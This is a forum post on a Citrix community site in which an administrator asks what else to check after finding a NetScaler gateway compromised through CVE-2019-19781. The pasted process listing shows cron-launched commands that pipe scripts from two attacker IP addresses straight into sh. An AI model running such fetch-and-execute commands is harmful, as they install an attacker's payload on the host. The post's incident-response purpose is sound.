Jump to content
Welcome to our new Citrix community!

Are there any other points we should check, after implematiitigation Steps for CVE-2019-19781


Hidefusa Yakabe

Recommended Posts

Are there any other points which we should check on a polluted netscaler gateway, after implematiitigation Steps for CVE-2019-19781?


- 1. investigate with below link
https://www.trustedsec.com/blog/netscaler-remote-code-execution-forensics/?utm_content=112033384&utm_medium=social&utm_source=twitter&hss_channel=tw-403811306

- 2. found our gateway polluted, executing curl command on nobody user's crontab 

-3. rename curl command to curl.org in order to avoid  executing the command temporally
-4.  implementing mitigation steps for CVE-2019-19781
-5. rename back to curl command and then I see nobody's crontab still working. 
how will we stop this command and any other points we should invest?
thanks    
 


ps -auxd | grep nobody
nobody     3307  0.0  0.1  8320  1644  ??  Ss    8:55PM   0:00.00 | | |-- /bin/sh -c curl http://62.113.112.33/ci.sh | sh > /dev/null 2>&1
nobody     3312  0.0  0.3 14740  4172  ??  S     8:55PM   0:00.01 | | | |-- curl http://62.113.112.33/ci.sh
nobody     3313  0.0  0.1  8320  1636  ??  S     8:55PM   0:00.00 | | | `-- sh
nobody     3315  0.0  0.0     0     0  ??  Z     8:55PM   0:00.00 | | `-- <defunct>
nobody     3305  0.0  0.1  8320  1644  ??  Ss    8:55PM   0:00.00 |   |-- /bin/sh -c curl http://185.178.45.221/ci.sh | sh > /dev/null 2>&1
nobody     3308  0.0  0.3 14740  4172  ??  S     8:55PM   0:00.01 |   | |-- curl http://185.178.45.221/ci.sh
nobody     3309  0.0  0.1  8320  1636  ??  S     8:55PM   0:00.00 |   | `-- sh
nobody     3314  0.0  0.0     0     0  ??  Z     8:55PM   0:00.00 |   `-- <defunct>

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
×
×
  • Create New...